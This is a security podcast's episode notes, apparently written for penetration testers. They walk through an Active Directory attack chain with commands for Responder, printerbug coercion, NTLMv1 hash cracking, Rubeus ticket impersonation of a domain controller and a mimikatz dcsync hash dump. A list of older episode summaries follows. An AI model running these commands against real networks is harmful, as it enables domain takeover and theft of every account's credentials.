7MS: #559: Tales of Pentest Pwnage - Part 46
7 Minute Security10 Feb 2023

7MS: #559: Tales of Pentest Pwnage - Part 46

Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood):

Change the Responder.conf file like so:

; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788

Run Responder with --disable-ess flag

sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess

Use printerbug to coax authentication from a domain controller:

sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX

Convert hash to make it easier to crack!

sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER

Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds!

Now you can do a Rubeus asktgt with the DC hash:

rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap

Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!

rubeus.exe ptt /ticket:TICKET GOES HERE

Use mimikatz to dump all hashes!

mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv

Avsnitt(703)

7MS #63: I'm Excited to Go Phishing (audio)

7MS #63: I'm Excited to Go Phishing (audio)

This week I'll be launching a phishing campaign against an organization that has been well trained to defend against such malicious attacks and links! Will this organization break my company's 100% success rate for phishing, or will I be able to craft an email to fool at least one person? 7MS #63: I'm Excited to…

21 Maj 20157min

7MS #62: You Should Run LAPS (audio)

7MS #62: You Should Run LAPS (audio)

I'm excited about this! Microsoft has released a tool called Local Administrator Password Solution to help administrators manage local admin credentials for domain-joined machines. Check out this article for more information, and please contact me if you end up running this, as I'd love to hear about your experience. 7MS #62: You Should Run LAPS…

19 Maj 20157min

7MS #61: Why Local Admin Rights Suck (audio)

7MS #61: Why Local Admin Rights Suck (audio)

Users running as local admins on their machine are a big risk! This episode discusses some reasons why, and also here is the link to the Avecto study I mention regarding how many Microsoft vulnerabilities would be thwarted by removing admin rights. 7MS #61: Why Local Admin Rights Suck (audio)

14 Maj 20158min

7MS #60: How Not to Suck at Customer Service (audio)

7MS #60: How Not to Suck at Customer Service (audio)

This episode was inspired by two awesome customer service experiences I had in the past week. It got me thinking: how can we as infosec professionals suck less with our customer service approach? 7MS #60: How Not to Suck at Customer Service (audio)

12 Maj 20158min

7MS #59: Traveling with a Red Giant – Part 2 (audio)

7MS #59: Traveling with a Red Giant – Part 2 (audio)

A few episodes back I talked about Red Giant, a cool service that provides you with a pre-paid debit card that can be controlled/locked with your phone. I finally got my card working, and this episode's about some cool things I learned about it. 7MS #59: Traveling with a Red Giant – Part 2 (audio)

7 Maj 20157min

7MS #58: What Should We Do First? (audio)

7MS #58: What Should We Do First? (audio)

At the end of just about every assessment I deliver, the client asks "What should we do first?" They (understandably) want to know a "top 5″ list of things they should change right away to improve their security posture. Today's episode explores that a bit. 7MS #58: What Should We Do Next? (audio)

5 Maj 20158min

7MS #57: How to Review a Firewall (audio)

7MS #57: How to Review a Firewall (audio)

In this episode I talk about a few different ways to approach firewall reviews/audits. This document was very helpful in getting my template started. Also check out Nipper if you're looking for a firewall review/audit tool. 7MS #57: How to Review a Firewall (audio)

30 Apr 20158min

7MS #56: OFFTOPIC – Catching Up and Blowing Noses (audio)

7MS #56: OFFTOPIC – Catching Up and Blowing Noses (audio)

A few offtopic things: What you can expect as far as a podcast release schedule going forward Two suspicious charges that showed up on my credit card while out of town! 7MS #56: OFFTOPIC – Catching Up and Blowing Noses (audio)

28 Apr 20158min

Populärt inom Politik & nyheter

aftonbladet-krim
svenska-fall
motiv
p3-krim
fordomspodden
rss-krimstad
flashback-forever
rss-viva-fotboll
blenda-2
aftonbladet-daily
rss-sanning-konsekvens
rss-vad-fan-hande
grans
rss-krimreportrarna
dagens-eko
rss-frandfors-horna
olyckan-inifran
rss-flodet
spotlight
rss-aftonbladet-krim